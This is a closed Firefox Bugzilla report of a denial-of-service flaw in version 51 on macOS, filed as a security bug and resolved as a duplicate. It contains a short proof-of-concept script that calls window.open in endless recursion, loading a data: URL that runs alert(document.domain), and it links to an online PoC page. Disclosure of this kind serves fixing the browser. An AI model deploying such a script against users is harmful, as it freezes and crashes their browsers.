Closed Bug 1339352 Opened 8 years ago Closed 8 years ago

Denial of Service using a link via.window.open()

Categories

(Firefox :: Untriaged, defect)

Product:
Firefox
Component:
Untriaged
Version:
51 Branch
Platform:
x86_64
macOS
Type:
defect
Priority:
Not set
Severity:
normal

Tracking

()

Status:
RESOLVED DUPLICATE of bug 685828

People

(Reporter: Wester, Unassigned)

Details

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36 Steps to reproduce: 1.the poc script is: <script> function g(){ window.open("https://cn.bing.com","z"); window.open("data:text/html,<script>alert(document.domain)<\/script>","z"); g(); }; </script> <a href="javascript:g()" style="font-size: 100px">click me</a> or visit online poc page: https://api.lightrains.org/poc/5.html 2.macOS version:10.12.3 firefox version:51.0.1 Actual results: firefox doesn't work anymore,cpu occupancy rate rise rapidly,then firefox will crashed. Expected results: As normal as ever
OS: Unspecified → Mac OS X
Hardware: Unspecified → x86_64
Group: firefox-core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
(In reply to :Gijs from comment #1) > > *** This bug has been marked as a duplicate of bug 685828 *** OK,Thank you for your work.
You need to log in before you can comment on or make changes to this bug.